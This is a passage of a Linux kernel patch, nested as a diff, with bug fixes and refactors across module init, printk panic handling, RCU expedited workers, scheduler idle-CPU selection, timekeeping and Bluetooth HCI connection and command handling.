+@@ -2524,8 +2529,8 @@ static noinline int do_init_module(struct module *mod)
+ 	 * Note that module_alloc() on most architectures creates W+X page
+ 	 * mappings which won't be cleaned up until do_free_init() runs.  Any
+ 	 * code such as mark_rodata_ro() which depends on those mappings to
+-	 * be cleaned up needs to sync with the queued work - ie
+-	 * rcu_barrier()
++	 * be cleaned up needs to sync with the queued work by invoking
++	 * flush_module_init_free_work().
+ 	 */
+ 	if (llist_add(&freeinit->node, &init_free_list))
+ 		schedule_work(&init_free_wq);
+diff --git a/kernel/printk/printk.c b/kernel/printk/printk.c
+index cc53fb77f77cc..981cdb00b8722 100644
+--- a/kernel/printk/printk.c
++++ b/kernel/printk/printk.c
+@@ -1797,10 +1797,23 @@ static bool console_waiter;
+  */
+ static void console_lock_spinning_enable(void)
+ {
++	/*
++	 * Do not use spinning in panic(). The panic CPU wants to keep the lock.
++	 * Non-panic CPUs abandon the flush anyway.
++	 *
++	 * Just keep the lockdep annotation. The panic-CPU should avoid
++	 * taking console_owner_lock because it might cause a deadlock.
++	 * This looks like the easiest way how to prevent false lockdep
++	 * reports without handling races a lockless way.
++	 */
++	if (panic_in_progress())
++		goto lockdep;
++
+ 	raw_spin_lock(&console_owner_lock);
+ 	console_owner = current;
+ 	raw_spin_unlock(&console_owner_lock);
+ 
++lockdep:
+ 	/* The waiter may spin on us after setting console_owner */
+ 	spin_acquire(&console_owner_dep_map, 0, 0, _THIS_IP_);
+ }
+@@ -1824,6 +1837,22 @@ static int console_lock_spinning_disable_and_check(void)
+ {
+ 	int waiter;
+ 
++	/*
++	 * Ignore spinning waiters during panic() because they might get stopped
++	 * or blocked at any time,
++	 *
++	 * It is safe because nobody is allowed to start spinning during panic
++	 * in the first place. If there has been a waiter then non panic CPUs
++	 * might stay spinning. They would get stopped anyway. The panic context
++	 * will never start spinning and an interrupted spin on panic CPU will
++	 * never continue.
++	 */
++	if (panic_in_progress()) {
++		/* Keep lockdep happy. */
++		spin_release(&console_owner_dep_map, _THIS_IP_);
++		return 0;
++	}
++
+ 	raw_spin_lock(&console_owner_lock);
+ 	waiter = READ_ONCE(console_waiter);
+ 	console_owner = NULL;
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 9d7464a90f85d..61f9503a5fe9c 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -4465,13 +4465,16 @@ static void __init rcu_start_exp_gp_kworkers(void)
+ 	rcu_exp_gp_kworker = kthread_create_worker(0, gp_kworker_name);
+ 	if (IS_ERR_OR_NULL(rcu_exp_gp_kworker)) {
+ 		pr_err("Failed to create %s!\n", gp_kworker_name);
++		rcu_exp_gp_kworker = NULL;
+ 		return;
+ 	}
+ 
+ 	rcu_exp_par_gp_kworker = kthread_create_worker(0, par_gp_kworker_name);
+ 	if (IS_ERR_OR_NULL(rcu_exp_par_gp_kworker)) {
+ 		pr_err("Failed to create %s!\n", par_gp_kworker_name);
++		rcu_exp_par_gp_kworker = NULL;
+ 		kthread_destroy_worker(rcu_exp_gp_kworker);
++		rcu_exp_gp_kworker = NULL;
+ 		return;
+ 	}
+ 
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index 6d2cbed96b462..75e8d9652f7bb 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -427,7 +427,12 @@ static void sync_rcu_exp_select_node_cpus(struct kthread_work *wp)
+ 	__sync_rcu_exp_select_node_cpus(rewp);
+ }
+ 
+-static inline bool rcu_gp_par_worker_started(void)
++static inline bool rcu_exp_worker_started(void)
++{
++	return !!READ_ONCE(rcu_exp_gp_kworker);
++}
++
++static inline bool rcu_exp_par_worker_started(void)
+ {
+ 	return !!READ_ONCE(rcu_exp_par_gp_kworker);
+ }
+@@ -477,7 +482,12 @@ static void sync_rcu_exp_select_node_cpus(struct work_struct *wp)
+ 	__sync_rcu_exp_select_node_cpus(rewp);
+ }
+ 
+-static inline bool rcu_gp_par_worker_started(void)
++static inline bool rcu_exp_worker_started(void)
++{
++	return !!READ_ONCE(rcu_gp_wq);
++}
++
++static inline bool rcu_exp_par_worker_started(void)
+ {
+ 	return !!READ_ONCE(rcu_par_gp_wq);
+ }
+@@ -540,7 +550,7 @@ static void sync_rcu_exp_select_cpus(void)
+ 		rnp->exp_need_flush = false;
+ 		if (!READ_ONCE(rnp->expmask))
+ 			continue; /* Avoid early boot non-existent wq. */
+-		if (!rcu_gp_par_worker_started() ||
++		if (!rcu_exp_par_worker_started() ||
+ 		    rcu_scheduler_active != RCU_SCHEDULER_RUNNING ||
+ 		    rcu_is_last_leaf_node(rnp)) {
+ 			/* No worker started yet or last leaf, do direct call. */
+@@ -910,7 +920,7 @@ static int rcu_print_task_exp_stall(struct rcu_node *rnp)
+  */
+ void synchronize_rcu_expedited(void)
+ {
+-	bool boottime = (rcu_scheduler_active == RCU_SCHEDULER_INIT);
++	bool use_worker;
+ 	unsigned long flags;
+ 	struct rcu_exp_work rew;
+ 	struct rcu_node *rnp;
+@@ -921,6 +931,9 @@ void synchronize_rcu_expedited(void)
+ 			 lock_is_held(&rcu_sched_lock_map),
+ 			 "Illegal synchronize_rcu_expedited() in RCU read-side critical section");
+ 
++	use_worker = (rcu_scheduler_active != RCU_SCHEDULER_INIT) &&
++		      rcu_exp_worker_started();
++
+ 	/* Is the state is such that the call is a grace period? */
+ 	if (rcu_blocking_is_gp()) {
+ 		// Note well that this code runs with !PREEMPT && !SMP.
+@@ -950,7 +963,7 @@ void synchronize_rcu_expedited(void)
+ 		return;  /* Someone else did our work for us. */
+ 
+ 	/* Ensure that load happens before action based on it. */
+-	if (unlikely(boottime)) {
++	if (unlikely(!use_worker)) {
+ 		/* Direct call during scheduler init and early_initcalls(). */
+ 		rcu_exp_sel_wait_wake(s);
+ 	} else {
+@@ -968,7 +981,7 @@ void synchronize_rcu_expedited(void)
+ 	/* Let the next expedited grace period start. */
+ 	mutex_unlock(&rcu_state.exp_mutex);
+ 
+-	if (likely(!boottime))
++	if (likely(use_worker))
+ 		synchronize_rcu_expedited_destroy_work(&rew);
+ }
+ EXPORT_SYMBOL_GPL(synchronize_rcu_expedited);
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 2558ab9033bee..91c101ecfef9f 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -6656,7 +6656,7 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ 		if (!available_idle_cpu(cpu)) {
+ 			idle = false;
+ 			if (*idle_cpu == -1) {
+-				if (sched_idle_cpu(cpu) && cpumask_test_cpu(cpu, p->cpus_ptr)) {
++				if (sched_idle_cpu(cpu) && cpumask_test_cpu(cpu, cpus)) {
+ 					*idle_cpu = cpu;
+ 					break;
+ 				}
+@@ -6664,7 +6664,7 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ 			}
+ 			break;
+ 		}
+-		if (*idle_cpu == -1 && cpumask_test_cpu(cpu, p->cpus_ptr))
++		if (*idle_cpu == -1 && cpumask_test_cpu(cpu, cpus))
+ 			*idle_cpu = cpu;
+ 	}
+ 
+@@ -6678,13 +6678,19 @@ static int select_idle_core(struct task_struct *p, int core, struct cpumask *cpu
+ /*
+  * Scan the local SMT mask for idle CPUs.
+  */
+-static int select_idle_smt(struct task_struct *p, int target)
++static int select_idle_smt(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	int cpu;
+ 
+ 	for_each_cpu_and(cpu, cpu_smt_mask(target), p->cpus_ptr) {
+ 		if (cpu == target)
+ 			continue;
++		/*
++		 * Check if the CPU is in the LLC scheduling domain of @target.
++		 * Due to isolcpus, there is no guarantee that all the siblings are in the domain.
++		 */
++		if (!cpumask_test_cpu(cpu, sched_domain_span(sd)))
++			continue;
+ 		if (available_idle_cpu(cpu) || sched_idle_cpu(cpu))
+ 			return cpu;
+ 	}
+@@ -6708,7 +6714,7 @@ static inline int select_idle_core(struct task_struct *p, int core, struct cpuma
+ 	return __select_idle_cpu(core, p);
+ }
+ 
+-static inline int select_idle_smt(struct task_struct *p, int target)
++static inline int select_idle_smt(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+ 	return -1;
+ }
+@@ -6970,7 +6976,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 		has_idle_core = test_idle_cores(target);
+ 
+ 		if (!has_idle_core && cpus_share_cache(prev, target)) {
+-			i = select_idle_smt(p, prev);
++			i = select_idle_smt(p, sd, prev);
+ 			if ((unsigned int)i < nr_cpumask_bits)
+ 				return i;
+ 		}
+diff --git a/kernel/time/time_test.c b/kernel/time/time_test.c
+index 831e8e779acef..f7c3de01197c9 100644
+--- a/kernel/time/time_test.c
++++ b/kernel/time/time_test.c
+@@ -73,7 +73,7 @@ static void time64_to_tm_test_date_range(struct kunit *test)
+ 
+ 		days = div_s64(secs, 86400);
+ 
+-		#define FAIL_MSG "%05ld/%02d/%02d (%2d) : %ld", \
++		#define FAIL_MSG "%05ld/%02d/%02d (%2d) : %lld", \
+ 			year, month, mdday, yday, days
+ 
+ 		KUNIT_ASSERT_EQ_MSG(test, year - 1900, result.tm_year, FAIL_MSG);
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index 221c8c404973a..b158cbef4d8dc 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -1180,13 +1180,15 @@ static int adjust_historical_crosststamp(struct system_time_snapshot *history,
+ }
+ 
+ /*
+- * cycle_between - true if test occurs chronologically between before and after
++ * timestamp_in_interval - true if ts is chronologically in [start, end]
++ *
++ * True if ts occurs chronologically at or after start, and before or at end.
+  */
+-static bool cycle_between(u64 before, u64 test, u64 after)
++static bool timestamp_in_interval(u64 start, u64 end, u64 ts)
+ {
+-	if (test > before && test < after)
++	if (ts >= start && ts <= end)
+ 		return true;
+-	if (test < before && before > after)
++	if (start > end && (ts >= start || ts <= end))
+ 		return true;
+ 	return false;
+ }
+@@ -1246,7 +1248,7 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 		 */
+ 		now = tk_clock_read(&tk->tkr_mono);
+ 		interval_start = tk->tkr_mono.cycle_last;
+-		if (!cycle_between(interval_start, cycles, now)) {
++		if (!timestamp_in_interval(interval_start, now, cycles)) {
+ 			clock_was_set_seq = tk->clock_was_set_seq;
+ 			cs_was_changed_seq = tk->cs_was_changed_seq;
+ 			cycles = interval_start;
+@@ -1259,10 +1261,8 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 				      tk_core.timekeeper.offs_real);
+ 		base_raw = tk->tkr_raw.base;
+ 
+-		nsec_real = timekeeping_cycles_to_ns(&tk->tkr_mono,
+-						     system_counterval.cycles);
+-		nsec_raw = timekeeping_cycles_to_ns(&tk->tkr_raw,
+-						    system_counterval.cycles);
++		nsec_real = timekeeping_cycles_to_ns(&tk->tkr_mono, cycles);
++		nsec_raw = timekeeping_cycles_to_ns(&tk->tkr_raw, cycles);
+ 	} while (read_seqcount_retry(&tk_core.seq, seq));
+ 
+ 	xtstamp->sys_realtime = ktime_add_ns(base_real, nsec_real);
+@@ -1277,13 +1277,13 @@ int get_device_system_crosststamp(int (*get_time_fn)
+ 		bool discontinuity;
+ 
+ 		/*
+-		 * Check that the counter value occurs after the provided
++		 * Check that the counter value is not before the provided
+ 		 * history reference and that the history doesn't cross a
+ 		 * clocksource change
+ 		 */
+ 		if (!history_begin ||
+-		    !cycle_between(history_begin->cycles,
+-				   system_counterval.cycles, cycles) ||
++		    !timestamp_in_interval(history_begin->cycles,
++					   cycles, system_counterval.cycles) ||
+ 		    history_begin->cs_was_changed_seq != cs_was_changed_seq)
+ 			return -EINVAL;
+ 		partial_history_cycles = cycles - system_counterval.cycles;
+diff --git a/lib/cmdline_kunit.c b/lib/cmdline_kunit.c
+index d4572dbc91453..705b82736be08 100644
+--- a/lib/cmdline_kunit.c
++++ b/lib/cmdline_kunit.c
+@@ -124,7 +124,7 @@ static void cmdline_do_one_range_test(struct kunit *test, const char *in,
+ 			    n, e[0], r[0]);
+ 
+ 	p = memchr_inv(&r[1], 0, sizeof(r) - sizeof(r[0]));
+-	KUNIT_EXPECT_PTR_EQ_MSG(test, p, NULL, "in test %u at %u out of bound", n, p - r);
++	KUNIT_EXPECT_PTR_EQ_MSG(test, p, NULL, "in test %u at %td out of bound", n, p - r);
+ }
+ 
+ static void cmdline_test_range(struct kunit *test)
+diff --git a/lib/memcpy_kunit.c b/lib/memcpy_kunit.c
+index 2b5cc70ac53fc..dbedd99aa6163 100644
+--- a/lib/memcpy_kunit.c
++++ b/lib/memcpy_kunit.c
+@@ -32,7 +32,7 @@ struct some_bytes {
+ 	BUILD_BUG_ON(sizeof(instance.data) != 32);	\
+ 	for (size_t i = 0; i < sizeof(instance.data); i++) {	\
+ 		KUNIT_ASSERT_EQ_MSG(test, instance.data[i], v, \
+-			"line %d: '%s' not initialized to 0x%02x @ %d (saw 0x%02x)\n", \
++			"line %d: '%s' not initialized to 0x%02x @ %zu (saw 0x%02x)\n", \
+ 			__LINE__, #instance, v, i, instance.data[i]);	\
+ 	}	\
+ } while (0)
+@@ -41,7 +41,7 @@ struct some_bytes {
+ 	BUILD_BUG_ON(sizeof(one) != sizeof(two)); \
+ 	for (size_t i = 0; i < sizeof(one); i++) {	\
+ 		KUNIT_EXPECT_EQ_MSG(test, one.data[i], two.data[i], \
+-			"line %d: %s.data[%d] (0x%02x) != %s.data[%d] (0x%02x)\n", \
++			"line %d: %s.data[%zu] (0x%02x) != %s.data[%zu] (0x%02x)\n", \
+ 			__LINE__, #one, i, one.data[i], #two, i, two.data[i]); \
+ 	}	\
+ 	kunit_info(test, "ok: " TEST_OP "() " name "\n");	\
+diff --git a/lib/test_blackhole_dev.c b/lib/test_blackhole_dev.c
+index 4c40580a99a36..f247089d63c08 100644
+--- a/lib/test_blackhole_dev.c
++++ b/lib/test_blackhole_dev.c
+@@ -29,7 +29,6 @@ static int __init test_blackholedev_init(void)
+ {
+ 	struct ipv6hdr *ip6h;
+ 	struct sk_buff *skb;
+-	struct ethhdr *ethh;
+ 	struct udphdr *uh;
+ 	int data_len;
+ 	int ret;
+@@ -61,7 +60,7 @@ static int __init test_blackholedev_init(void)
+ 	ip6h->saddr = in6addr_loopback;
+ 	ip6h->daddr = in6addr_loopback;
+ 	/* Ether */
+-	ethh = (struct ethhdr *)skb_push(skb, sizeof(struct ethhdr));
++	skb_push(skb, sizeof(struct ethhdr));
+ 	skb_set_mac_header(skb, 0);
+ 
+ 	skb->protocol = htons(ETH_P_IPV6);
+diff --git a/net/bluetooth/af_bluetooth.c b/net/bluetooth/af_bluetooth.c
+index f1b7510359e4b..3f9ff02baafe3 100644
+--- a/net/bluetooth/af_bluetooth.c
++++ b/net/bluetooth/af_bluetooth.c
+@@ -264,14 +264,11 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	if (flags & MSG_OOB)
+ 		return -EOPNOTSUPP;
+ 
+-	lock_sock(sk);
+-
+ 	skb = skb_recv_datagram(sk, flags, &err);
+ 	if (!skb) {
+ 		if (sk->sk_shutdown & RCV_SHUTDOWN)
+ 			err = 0;
+ 
+-		release_sock(sk);
+ 		return err;
+ 	}
+ 
+@@ -297,8 +294,6 @@ int bt_sock_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 
+ 	skb_free_datagram(sk, skb);
+ 
+-	release_sock(sk);
+-
+ 	if (flags & MSG_TRUNC)
+ 		copied = skblen;
+ 
+@@ -521,10 +516,11 @@ int bt_sock_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg)
+ 		if (sk->sk_state == BT_LISTEN)
+ 			return -EINVAL;
+ 
+-		lock_sock(sk);
++		spin_lock(&sk->sk_receive_queue.lock);
+ 		skb = skb_peek(&sk->sk_receive_queue);
+ 		amount = skb ? skb->len : 0;
+-		release_sock(sk);
++		spin_unlock(&sk->sk_receive_queue.lock);
++
+ 		err = put_user(amount, (int __user *)arg);
+ 		break;
+ 
+diff --git a/net/bluetooth/eir.c b/net/bluetooth/eir.c
+index 8a85f6cdfbc16..1bc51e2b05a34 100644
+--- a/net/bluetooth/eir.c
++++ b/net/bluetooth/eir.c
+@@ -13,48 +13,33 @@
+ 
+ #define PNP_INFO_SVCLASS_ID		0x1200
+ 
+-static u8 eir_append_name(u8 *eir, u16 eir_len, u8 type, u8 *data, u8 data_len)
+-{
+-	u8 name[HCI_MAX_SHORT_NAME_LENGTH + 1];
+-
+-	/* If data is already NULL terminated just pass it directly */
+-	if (data[data_len - 1] == '\0')
+-		return eir_append_data(eir, eir_len, type, data, data_len);
+-
+-	memcpy(name, data, HCI_MAX_SHORT_NAME_LENGTH);
+-	name[HCI_MAX_SHORT_NAME_LENGTH] = '\0';
+-
+-	return eir_append_data(eir, eir_len, type, name, sizeof(name));
+-}
+-
+ u8 eir_append_local_name(struct hci_dev *hdev, u8 *ptr, u8 ad_len)
+ {
+ 	size_t short_len;
+ 	size_t complete_len;
+ 
+-	/* no space left for name (+ NULL + type + len) */
+-	if ((HCI_MAX_AD_LENGTH - ad_len) < HCI_MAX_SHORT_NAME_LENGTH + 3)
++	/* no space left for name (+ type + len) */
++	if ((max_adv_len(hdev) - ad_len) < HCI_MAX_SHORT_NAME_LENGTH + 2)
+ 		return ad_len;
+ 
+ 	/* use complete name if present and fits */
+ 	complete_len = strnlen(hdev->dev_name, sizeof(hdev->dev_name));
+ 	if (complete_len && complete_len <= HCI_MAX_SHORT_NAME_LENGTH)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_COMPLETE,
+-				       hdev->dev_name, complete_len + 1);
++		return eir_append_data(ptr, ad_len, EIR_NAME_COMPLETE,
++				       hdev->dev_name, complete_len);
+ 
+ 	/* use short name if present */
+ 	short_len = strnlen(hdev->short_name, sizeof(hdev->short_name));
+ 	if (short_len)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_SHORT,
++		return eir_append_data(ptr, ad_len, EIR_NAME_SHORT,
+ 				       hdev->short_name,
+-				       short_len == HCI_MAX_SHORT_NAME_LENGTH ?
+-				       short_len : short_len + 1);
++				       short_len);
+ 
+ 	/* use shortened full name if present, we already know that name
+ 	 * is longer then HCI_MAX_SHORT_NAME_LENGTH
+ 	 */
+ 	if (complete_len)
+-		return eir_append_name(ptr, ad_len, EIR_NAME_SHORT,
++		return eir_append_data(ptr, ad_len, EIR_NAME_SHORT,
+ 				       hdev->dev_name,
+ 				       HCI_MAX_SHORT_NAME_LENGTH);
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 12d36875358b9..bac5a369d2bef 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -175,57 +175,6 @@ static void hci_conn_cleanup(struct hci_conn *conn)
+ 	hci_dev_put(hdev);
+ }
+ 
+-static void le_scan_cleanup(struct work_struct *work)
+-{
+-	struct hci_conn *conn = container_of(work, struct hci_conn,
+-					     le_scan_cleanup);
+-	struct hci_dev *hdev = conn->hdev;
+-	struct hci_conn *c = NULL;
+-
+-	BT_DBG("%s hcon %p", hdev->name, conn);
+-
+-	hci_dev_lock(hdev);
+-
+-	/* Check that the hci_conn is still around */
+-	rcu_read_lock();
+-	list_for_each_entry_rcu(c, &hdev->conn_hash.list, list) {
+-		if (c == conn)
+-			break;
+-	}
+-	rcu_read_unlock();
+-
+-	if (c == conn) {
+-		hci_connect_le_scan_cleanup(conn, 0x00);
+-		hci_conn_cleanup(conn);
+-	}
+-
+-	hci_dev_unlock(hdev);
+-	hci_dev_put(hdev);
+-	hci_conn_put(conn);
+-}
+-
+-static void hci_connect_le_scan_remove(struct hci_conn *conn)
+-{
+-	BT_DBG("%s hcon %p", conn->hdev->name, conn);
+-
+-	/* We can't call hci_conn_del/hci_conn_cleanup here since that
+-	 * could deadlock with another hci_conn_del() call that's holding
+-	 * hci_dev_lock and doing cancel_delayed_work_sync(&conn->disc_work).
+-	 * Instead, grab temporary extra references to the hci_dev and
+-	 * hci_conn and perform the necessary cleanup in a separate work
+-	 * callback.
+-	 */
+-
+-	hci_dev_hold(conn->hdev);
+-	hci_conn_get(conn);
+-
+-	/* Even though we hold a reference to the hdev, many other
+-	 * things might get cleaned up meanwhile, including the hdev's
+-	 * own workqueue, so we can't use that for scheduling.
+-	 */
+-	schedule_work(&conn->le_scan_cleanup);
+-}
+-
+ static void hci_acl_create_connection(struct hci_conn *conn)
+ {
+ 	struct hci_dev *hdev = conn->hdev;
+@@ -672,13 +621,6 @@ static void hci_conn_timeout(struct work_struct *work)
+ 	if (refcnt > 0)
+ 		return;
+ 
+-	/* LE connections in scanning state need special handling */
+-	if (conn->state == BT_CONNECT && conn->type == LE_LINK &&
+-	    test_bit(HCI_CONN_SCANNING, &conn->flags)) {
+-		hci_connect_le_scan_remove(conn);
+-		return;
+-	}
+-
+ 	hci_abort_conn(conn, hci_proto_disconn_ind(conn));
+ }
+ 
+@@ -1050,7 +992,6 @@ struct hci_conn *hci_conn_add(struct hci_dev *hdev, int type, bdaddr_t *dst,
+ 	INIT_DELAYED_WORK(&conn->auto_accept_work, hci_conn_auto_accept);
+ 	INIT_DELAYED_WORK(&conn->idle_work, hci_conn_idle);
+ 	INIT_DELAYED_WORK(&conn->le_conn_timeout, le_conn_timeout);
+-	INIT_WORK(&conn->le_scan_cleanup, le_scan_cleanup);
+ 
+ 	atomic_set(&conn->refcnt, 0);
+ 
+@@ -2837,81 +2778,46 @@ u32 hci_conn_get_phy(struct hci_conn *conn)
+ 	return phys;
+ }
+ 
+-int hci_abort_conn(struct hci_conn *conn, u8 reason)
++static int abort_conn_sync(struct hci_dev *hdev, void *data)
+ {
+-	int r = 0;
++	struct hci_conn *conn;
++	u16 handle = PTR_ERR(data);
+ 
+-	if (test_and_set_bit(HCI_CONN_CANCEL, &conn->flags))
++	conn = hci_conn_hash_lookup_handle(hdev, handle);
++	if (!conn)
+ 		return 0;
+ 
+-	switch (conn->state) {
+-	case BT_CONNECTED:
+-	case BT_CONFIG:
+-		if (conn->type == AMP_LINK) {
+-			struct hci_cp_disconn_phy_link cp;
++	return hci_abort_conn_sync(hdev, conn, conn->abort_reason);
++}
+ 
+-			cp.phy_handle = HCI_PHY_HANDLE(conn->handle);
+-			cp.reason = reason;
+-			r = hci_send_cmd(conn->hdev, HCI_OP_DISCONN_PHY_LINK,
+-					 sizeof(cp), &cp);
+-		} else {
+-			struct hci_cp_disconnect dc;
++int hci_abort_conn(struct hci_conn *conn, u8 reason)
++{
++	struct hci_dev *hdev = conn->hdev;
+ 
+-			dc.handle = cpu_to_le16(conn->handle);
+-			dc.reason = reason;
+-			r = hci_send_cmd(conn->hdev, HCI_OP_DISCONNECT,
+-					 sizeof(dc), &dc);
+-		}
++	/* If abort_reason has already been set it means the connection is
++	 * already being aborted so don't attempt to overwrite it.
++	 */
++	if (conn->abort_reason)
++		return 0;
+ 
+-		conn->state = BT_DISCONN;
++	bt_dev_dbg(hdev, "handle 0x%2.2x reason 0x%2.2x", conn->handle, reason);
+ 
+-		break;
+-	case BT_CONNECT:
+-		if (conn->type == LE_LINK) {
+-			if (test_bit(HCI_CONN_SCANNING, &conn->flags))
+-				break;
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_LE_CREATE_CONN_CANCEL, 0, NULL);
+-		} else if (conn->type == ACL_LINK) {
+-			if (conn->hdev->hci_ver < BLUETOOTH_VER_1_2)
+-				break;
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_CREATE_CONN_CANCEL,
+-					 6, &conn->dst);
+-		}
+-		break;
+-	case BT_CONNECT2:
+-		if (conn->type == ACL_LINK) {
+-			struct hci_cp_reject_conn_req rej;
+-
+-			bacpy(&rej.bdaddr, &conn->dst);
+-			rej.reason = reason;
+-
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_REJECT_CONN_REQ,
+-					 sizeof(rej), &rej);
+-		} else if (conn->type == SCO_LINK || conn->type == ESCO_LINK) {
+-			struct hci_cp_reject_sync_conn_req rej;
+-
+-			bacpy(&rej.bdaddr, &conn->dst);
+-
+-			/* SCO rejection has its own limited set of
+-			 * allowed error values (0x0D-0x0F) which isn't
+-			 * compatible with most values passed to this
+-			 * function. To be safe hard-code one of the
+-			 * values that's suitable for SCO.
+-			 */
+-			rej.reason = HCI_ERROR_REJ_LIMITED_RESOURCES;
++	conn->abort_reason = reason;
+ 
+-			r = hci_send_cmd(conn->hdev,
+-					 HCI_OP_REJECT_SYNC_CONN_REQ,
+-					 sizeof(rej), &rej);
++	/* If the connection is pending check the command opcode since that
++	 * might be blocking on hci_cmd_sync_work while waiting its respective
++	 * event so we need to hci_cmd_sync_cancel to cancel it.
++	 */
++	if (conn->state == BT_CONNECT && hdev->req_status == HCI_REQ_PEND) {
++		switch (hci_skb_event(hdev->sent_cmd)) {
++		case HCI_EV_LE_CONN_COMPLETE:
++		case HCI_EV_LE_ENHANCED_CONN_COMPLETE:
++		case HCI_EVT_LE_CIS_ESTABLISHED:
++			hci_cmd_sync_cancel(hdev, ECANCELED);
++			break;
+ 		}
+-		break;
+-	default:
+-		conn->state = BT_CLOSED;
+-		break;
+ 	}
+ 
+-	return r;
++	return hci_cmd_sync_queue(hdev, abort_conn_sync, ERR_PTR(conn->handle),
++				  NULL);
+ }
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index a8932d449eb63..70f24dc75b596 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -908,7 +908,7 @@ int hci_get_dev_info(void __user *arg)
+ 	else
+ 		flags = hdev->flags;
+ 
+-	strcpy(di.name, hdev->name);
++	strscpy(di.name, hdev->name, sizeof(di.name));
+ 	di.bdaddr   = hdev->bdaddr;
+ 	di.type     = (hdev->bus & 0x0f) | ((hdev->dev_type & 0x03) << 4);
+ 	di.flags    = flags;
+@@ -1491,11 +1491,12 @@ static void hci_cmd_timeout(struct work_struct *work)
+ 	struct hci_dev *hdev = container_of(work, struct hci_dev,
+ 					    cmd_timer.work);
+ 
+-	if (hdev->sent_cmd) {
+-		struct hci_command_hdr *sent = (void *) hdev->sent_cmd->data;
+-		u16 opcode = __le16_to_cpu(sent->opcode);
++	if (hdev->req_skb) {
++		u16 opcode = hci_skb_opcode(hdev->req_skb);
+ 
+ 		bt_dev_err(hdev, "command 0x%4.4x tx timeout", opcode);
++
++		hci_cmd_sync_cancel_sync(hdev, ETIMEDOUT);
+ 	} else {
+ 		bt_dev_err(hdev, "command tx timeout");
+ 	}
+@@ -2791,6 +2792,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+ 	kfree_skb(hdev->sent_cmd);
++	kfree_skb(hdev->req_skb);
+ 	kfree_skb(hdev->recv_event);
+ 	kfree(hdev);
+ }
+@@ -2822,6 +2824,23 @@ int hci_unregister_suspend_notifier(struct hci_dev *hdev)
+ 	return ret;
+ }
+ 
++/* Cancel ongoing command synchronously:
++ *
++ * - Cancel command timer
++ * - Reset command counter
++ * - Cancel command request
++ */
++static void hci_cancel_cmd_sync(struct hci_dev *hdev, int err)
++{
++	bt_dev_dbg(hdev, "err 0x%2.2x", err);
++
++	cancel_delayed_work_sync(&hdev->cmd_timer);
++	cancel_delayed_work_sync(&hdev->ncmd_timer);
++	atomic_set(&hdev->cmd_cnt, 1);
++
++	hci_cmd_sync_cancel_sync(hdev, -err);
++}
++
+ /* Suspend HCI device */
+ int hci_suspend_dev(struct hci_dev *hdev)
+ {
+@@ -2838,6 +2857,9 @@ int hci_suspend_dev(struct hci_dev *hdev)
+ 	if (mgmt_powering_down(hdev))
+ 		return 0;
+ 
++	/* Cancel potentially blocking sync operation before suspend */
++	hci_cancel_cmd_sync(hdev, -EHOSTDOWN);
++
+ 	hci_req_sync_lock(hdev);
+ 	ret = hci_suspend_sync(hdev);
+ 	hci_req_sync_unlock(hdev);
+@@ -3100,21 +3122,33 @@ int __hci_cmd_send(struct hci_dev *hdev, u16 opcode, u32 plen,
+ EXPORT_SYMBOL(__hci_cmd_send);
+ 
+ /* Get data from the previously sent command */
+-void *hci_sent_cmd_data(struct hci_dev *hdev, __u16 opcode)
++static void *hci_cmd_data(struct sk_buff *skb, __u16 opcode)
+ {
+ 	struct hci_command_hdr *hdr;
+ 
+-	if (!hdev->sent_cmd)
++	if (!skb || skb->len < HCI_COMMAND_HDR_SIZE)
+ 		return NULL;
+ 
+-	hdr = (void *) hdev->sent_cmd->data;
++	hdr = (void *)skb->data;
+ 
+ 	if (hdr->opcode != cpu_to_le16(opcode))
+ 		return NULL;
+ 
+-	BT_DBG("%s opcode 0x%4.4x", hdev->name, opcode);
++	return skb->data + HCI_COMMAND_HDR_SIZE;
++}
++
++/* Get data from the previously sent command */
++void *hci_sent_cmd_data(struct hci_dev *hdev, __u16 opcode)
++{
++	void *data;
++
++	/* Check if opcode matches last sent command */
++	data = hci_cmd_data(hdev->sent_cmd, opcode);
++	if (!data)
++		/* Check if opcode matches last request */
++		data = hci_cmd_data(hdev->req_skb, opcode);
+ 
+-	return hdev->sent_cmd->data + HCI_COMMAND_HDR_SIZE;
++	return data;
+ }
+ 
+ /* Get data from last received event */
+@@ -4010,17 +4044,19 @@ void hci_req_cmd_complete(struct hci_dev *hdev, u16 opcode, u8 status,
+ 	if (!status && !hci_req_is_complete(hdev))
+ 		return;
+ 
++	skb = hdev->req_skb;
++
+ 	/* If this was the last command in a request the complete
+-	 * callback would be found in hdev->sent_cmd instead of the
++	 * callback would be found in hdev->req_skb instead of the
+ 	 * command queue (hdev->cmd_q).
+ 	 */
